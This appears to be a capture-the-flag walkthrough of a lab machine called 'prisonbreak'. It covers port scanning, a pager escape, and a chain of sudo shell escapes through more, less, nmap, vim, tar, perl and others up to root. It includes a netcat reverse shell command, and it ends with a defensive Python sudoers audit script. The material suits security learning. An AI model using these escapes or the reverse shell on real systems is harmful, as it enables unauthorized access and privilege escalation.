prisonbreak

### By b13ss3d ###

There's also a video version, if you want to check it out: prisonbreak

Port Scanning

First we perform a port scan using Rustscan to identify open ports.

rustscan -a 10.0.200.47
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

Open 10.0.200.47:22
Open 10.0.200.47:1337

Once we know what ports are open, we use nmap to obtain the services and their versions running on these ports.

❯ nmap -p22,1337 -sCV -n -Pn -v 10.0.200.47 -oN scan
<SNIP>
Nmap scan report for 10.0.200.47
Host is up (0.15s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 39:d8:72:f0:6f:74:58:78:ea:2b:e4:06:b9:82:67:65 (RSA)
|   256 55:8b:25:46:3d:72:08:35:46:23:4f:4c:fa:70:ba:a7 (ECDSA)
|_  256 10:ce:b4:58:a2:c3:59:5b:0f:e7:91:e3:6a:04:fb:4e (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, NULL: 
|     [?1049h
|     [?1h
|     MORE(1) User Commands MORE(1)
<SNIP>
  • -p <ports>: scan only the listed ports (here 22 and 1337).

  • -sCV combines the options -sC and -sV. From nmap's help:

  • -sC: equivalent to --script=default

  • -sV: Probe open ports to determine service/version info

  • -n: Never do DNS resolution

  • -v: Increase verbosity level (-vv or -vvv for more output)

  • -oN <file>: Output scan in normal format.

Port 22 is running SSH, but Nmap cannot determine the service on port 1337, so we'll need to identify it manually.

Gaining access

Using Netcat to connect to port 1337, we receive the manual for the "more" command. We can escape from this environment by pressing Esc and then typing :!bash. After pressing Enter, we obtain a shell.

Upgrading shell

To upgrade the shell, we execute the following command: script /dev/null -qc bash

Next, press Ctrl+Z and then run: stty raw -echo; fg

Finally, reset the terminal: reset xterm

With the shell back, execute: export TERM=xterm

And adjust the terminal size with: stty rows 44 cols 172

Horizontal privilege escalation

cell2 user

With the shell as the "cell1" user, execute: sudo -l

  • sudo -l (--list): list the user's sudo privileges.

We see that we can execute more as the "cell2" user. Elevate privileges by running: sudo -u cell2 more /etc/passwd (or any other existing file). Press Esc followed by :!bash, just as before, to become the "cell2" user.

Having done this, we are the "cell2" user.

cell3 user

Run sudo -l again, and you'll see that you can execute less as the "cell3" user.

Searching on Google, we found this resource that explains how to escape from less when it is run through sudo. Follow this process: sudo -u cell3 /usr/bin/less /etc/passwd then press Esc and type :!bash to switch to the "cell3" user.

cell4 user

As the "cell3" user, run sudo -l:

Note that you can execute nmap as the "cell4" user. Searching for ways to escalate privileges with nmap, we found this method on GTFObins to execute commands:

First, move to a directory we can write to, such as /tmp, and execute the following commands: echo 'os.execute("/bin/bash")' > test followed by sudo -u cell4 /usr/bin/nmap --script test. You now have access as "cell4".

cell5 user

As "cell4", run: sudo -l

To escalate to "cell5", we found this GTFObins resource. Execute: sudo -u cell5 /usr/bin/awk 'BEGIN {system("/bin/bash")}'

We are now cell5.

cell6 user

For "cell6", execute sudo -l:

To gain access as "cell6", you can use the method outlined here: sudo -u cell6 /usr/bin/find . -exec /bin/bash \; -quit

After executing this command we are cell6.

cell7 user

Run sudo -l as "cell6":

This user can use sudo to execute vim as cell7; use this method found on GTFObins: sudo -u cell7 /usr/bin/vim -c ':!/bin/bash'

And you'll be cell7.

cell8 user

For "cell8", execute sudo -l:

So execute: sudo -u cell8 /usr/bin/links /etc/passwd, then press Esc twice, hit Enter and select the option to spawn an OS shell.

And you are now cell8.

cell9 user

Being "cell8" execute sudo -l:

This user can execute /usr/bin/lynx as "cell9". Following the steps from this resource, execute: sudo -u cell9 /usr/bin/lynx /etc/passwd, then open the options menu with o.

Change the Editor to /usr/bin/vim.

Accept the changes.

Finally press "e" to enter the editor, and escape from Vim by pressing Esc followed by :!bash.

cell10 user

Execute sudo -l:

cell9 can execute /usr/bin/zip as cell10.

To escalate privileges, use this method found on GTFObins: sudo -u cell10 /usr/bin/zip /tmp/test /etc/hosts -T -TT 'bash #'

cell11 user

As "cell10", run: sudo -l

cell10 can execute /bin/tar as cell11. GTFObins lists this method to execute commands: sudo -u cell11 /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

cell12 user

Execute sudo -l:

cell11 can execute /usr/bin/mutt as cell12, so execute: sudo -u cell12 /usr/bin/mutt. To escape, press Esc followed by !.

Here enter bash to get a shell, as explained in this resource.

cell13 user

As "cell12", execute sudo -l:

To escalate to cell13, execute: sudo -u cell13 /usr/bin/pinfo and press ! to open a shell prompt within pinfo.

Set up a listener on another tab: nc -nlvp 443. In the pinfo shell prompt, create a reverse shell: nc -e /bin/bash <ip> 443

Replace <ip> with your actual IP address. In your listener terminal, you should receive a connection.

Upgrade the shell: script /dev/null -qc bash, then press Ctrl+Z and immediately execute: stty raw -echo; fg

Finally execute reset xterm

You are now cell13.

root user

As cell13, execute sudo -l:

cell13 can execute /usr/bin/perl as root. This method on GTFObins shows us how to execute commands: sudo /usr/bin/perl -e 'exec "/bin/bash";'

Congratulations! You now have root access.

The flags can be found in:

  • /root

  • /etc/shadow

  • /proc/1/environ

  • The home directory of every "cell" user.
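Every hop in the chain above is the same misconfiguration: a sudo rule that hands another user a pager, editor or tool with a command hook. The following audit script is an added example, not part of the original writeup; it parses sudoers-style rules (the sample fragment is constructed to mirror the cell1 to root chain) and flags rules for binaries the writeup escaped from that do not carry the NOEXEC tag.

```python
"""Audit sudoers rules for binaries with known interactive shell escapes.

Added example for this writeup. The sample rules are constructed; the flagged
program set is the list of binaries used in the cell1 -> root chain.
"""
import os
import re

# Programs the writeup broke out of: pagers, editors and tools with command
# hooks. A sudo rule that grants one of these to another user is not a
# privilege boundary; NOEXEC (sudo's LD_PRELOAD exec blocker) reduces the
# risk but removing the rule is the real fix.
SHELL_ESCAPE_BINARIES = {
    "more", "less", "nmap", "awk", "find", "vim", "links", "lynx",
    "zip", "tar", "mutt", "pinfo", "perl",
}

# Constructed sudoers fragment mirroring the box; the "backup" line shows a
# rule that already carries a mitigation tag and is therefore not flagged.
SAMPLE_SUDOERS = """\
# constructed sample, not the real /etc/sudoers
Defaults env_reset
cell1 ALL=(cell2) NOPASSWD: /bin/more
cell2 ALL=(cell3) NOPASSWD: /usr/bin/less
cell3 ALL=(cell4) NOPASSWD: /usr/bin/nmap
cell13 ALL=(root) NOPASSWD: /usr/bin/perl
backup ALL=(root) NOPASSWD: NOEXEC: /bin/tar
ops ALL=(root) /usr/bin/systemctl restart nginx
"""

# user  host=(runas)  [TAG: TAG: ...]  command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]+)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return (user, runas, program, tags) for every rule that allows a shell escape."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # aliases, includes and other directives are out of scope here
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            program = os.path.basename(cmd.strip().split()[0])
            if program in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
                findings.append((m.group("user"), m.group("runas"), program, sorted(tags)))
    return findings


if __name__ == "__main__":
    for user, runas, prog, tags in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} -> {runas} via {prog}: shell escape possible, tags={tags}")
```

Run it against the output of a real sudoers dump to find the same pattern before an attacker does; expect the four cell rules to be reported and the NOEXEC-tagged tar rule to pass.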
